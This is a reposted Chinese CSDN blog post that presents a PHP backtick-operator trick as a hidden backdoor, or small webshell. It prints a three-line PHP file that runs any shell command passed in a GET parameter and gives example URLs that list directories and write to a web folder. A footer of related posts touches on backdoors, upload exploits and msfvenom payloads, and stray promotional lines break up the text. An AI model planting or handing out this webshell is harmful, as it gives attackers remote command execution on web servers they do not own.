<转载>一个官方没有公布的php秘籍,可用作后门

最新推荐文章于 2016-06-19 19:52:00 发布
最新推荐文章于 2016-06-19 19:52:00 发布
阅读量73 收藏
点赞数
分类专栏: hacker 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84163265
版权

可以看看

http://www.webshell.cc/3303.html

好奇怪的漏洞?

可以当做个小马使用,比较有意思的一个东西

写道
被过滤广告
发现这个也是巧合,我就直接说了吧

<?php
//t.php
$test = $_GET['r'];
echo `$test`;
?>大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webshell.cc/t.php?r=dir

可以列出目录

http://webshell.cc/t.php?r=echo

我是马儿 D:\web\webshell.cc.php

大家觉得我没有忽悠 就赏点分哈


文章来自: WebShell'S Blog 本文地址:http://www.webshell.cc/3303.html

 

 

 

wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
某教程学习笔记(一):17、php漏洞
weixin_41489908的博客
02-29 254
原来过了十八岁以后,就再也没有夏天了,只有如约而至的七月、八月和九月,夏天是短裤蝉鸣,和一阵暴雨后少年满怀的心事,是在八月就开始憧憬九月开学的日子。。。。 一、文件包含漏洞 1、常见包含函数 include(),require(),include_once(),require_once() 2、本地文件包含,新建一个include.php文件,里面输入 <?php $test=$_GET[...
后门分析思路
weixin_34197488的博客
11-05 638
什么是后门程序 后门程序又称特洛伊***,其用途在于潜伏在电脑中,从事搜集信息或便于***进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。 后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。 后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败...
悄悄蒙上你的眼睛 后门程序知识完全解析
weixin_30767835的博客
03-31 436
 什么是后门程序   后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。   后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还 能挫败系统上各种增强的安全设置。   后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一个新的账号,或者...
一些对数学领域及数学研究的个人看法(转载自博士论坛wcboy)
weixin_30481087的博客
06-19 3761
转自:http://www.math.org.cn/forum.php?mod=viewthread&tid=14819&extra=&page=1 原作者: wcboy 现在的论坛质量比以前差了,大部分都是来解题问答的,而且层次较低。以前论坛中,Qullien很令人印象深刻,但愿他能在国外闯出一片天空。现在 基础数学版代数&数论子版中那几个讨论代数几何的还不...
一个不易被发现的PHP后门代码解析
10-25
该请求将执行命令'echo 我是马儿>>D:\web\90sec.php',在服务器上的D:\web目录创建或覆盖一个名为90sec.php的文件,内容为"我是马儿"。 在代码解析中提到,攻击者利用了一个常见的视觉盲点,即使用了一个位于Esc键...
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
pw的一个后门的方法分析
10-30
### pw的一个后门的方法分析 #### 背景与目的 本文旨在深入探讨一种针对PW(PHPWind)系统的特定后门植入方法。通过详细分析该技术的具体实施过程及其潜在安全威胁,帮助读者理解此类攻击手段的工作原理,并提供...
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
python 反编译 pyc 一些心得
ice
09-06 2888
0x01 , 现在用python的人也多了起来,代码安全始终是我们要考虑的问题,比如说我们要将我们的成果发布出去,py直接发布肯定是不行的(除非你是开源的),那么我们就只能考虑发布pyc文件了,     0x02,今天讨论的就是怎么反编译pyc到源代码的技术,从道理上来讲,这个是完全没问题的,而且反编译出来的代码质量应该相当高才对(参考java class的原理),在百度里面搜索的话,信息量...
密码字典
ice
02-16 1745
这是我根据前一段各种密码门做的一个密码字典(大概通过3亿多账号统计出来的,当然有重复,也有数据不规整),我给大家放出来一部分高频密码统计  ...
metasploit 图形化界面和自动化exploit脚本
ice
10-21 1687
0x01 最新版的metasploit没了图形化界面,              armitage开始收费              那我们就选用msfgui吧,安装简单                https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe               下载安装就可以了 ...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1158
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 &lt;title&gt;eWebeditoR3.8 for php任意文件上EXP&lt;/title&gt; &lt;form action="" method=post enctype="multipart/form-data"&gt; &lt;INPUT TYPE="hidden" name="MAX_F
APKTool签名的一个问题
ice
10-14 717
0x01 昨天写了反编译,今天就写下签名的问题   0x02 apktool的重打包功能大家都知道,堪称神器,各类破解人事必备之良器,          用法不多说,只说签名容易遇到的问题 0x03 创建私钥仓库这个事情就不多说,方法很多,eclipse和keytool       都有类似功能         需要注意的是,这个私钥仓库一共有两个密码,一个是私钥仓库的密码(stor...
android恶意程序分析 (一)
ice
03-29 712
  决定了毕设做android安全方向的相关内容,那么每天一篇android恶意软件分析是少不了。今天就是第一篇 首先介绍个网站 http://contagiominidump.blogspot.com/ 非常好的一个网站,主要是他隔三差五的会放出个android恶意软件,我的分析就是基于他给出的apk文件。 注意要FQ       android.dds.com-STiNiTER...
CVE 2012 0507 分析
ice
12-17 674
0x01 https://github.com/wchen-r7/metasploit-framework/blob/791ebdb679d53f6363cf88a54db57722719cd62a/external/source/exploits/CVE-2012-0507/Exploit.java   这里就是java的cve 2012 0507的poc所在了,大部分网上流传的基本上...
ewebeditor上传漏洞
ice
10-10 661
&lt;H3&gt;ewebeditor asp版 2.1.6 上传漏洞利用程序----&lt;/H3&gt;&lt;br&gt;&lt;br&gt; &lt;form action="http://xxxx/include/wedit/upload.asp?action=save&amp;type=IMAGE&amp;style=standard' and 1=2 union select S...
CVE-2013-0422 分析2
ice
01-11 572
0x01 http://wcf1987.iteye.com/blog/1749088 这是对CVE-2012-0507的分析 http://wcf1987.iteye.com/blog/1768355这是对CVE-2013-0422的分析 本文则是java的cve-2013-0422的分析,其实看poc感觉上就跟CVE-2012-0507有几分相似的地方,都是最终利用了definecl...
phpcms v9 爆密码
ice
07-25 484
   1.首先是http://www.wooyun.org/bugs/wooyun-2010-010072       有人报告phpcms v9 直接爆密码     开始我还比较迷惑,因为我记得我看过phpcms v9 的管理员密码体系是有salt的,光爆密码没啥用啊?     2.后面有人指出了是和前一个http://www.wooyun.org/bugs/wooyun-2010-09...
如何使用 msfvenom创造一个php后门
最新发布
04-07
3. 运行命令后,将创建一个名为`backdoor.php`的文件,其中包含Meterpreter反向TCP Shell的payload。 4. 上传`backdoor.php`到目标服务器。 5. 打开Meterpreter会话,输入以下命令: ``` php backdoor.php ``` 6...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值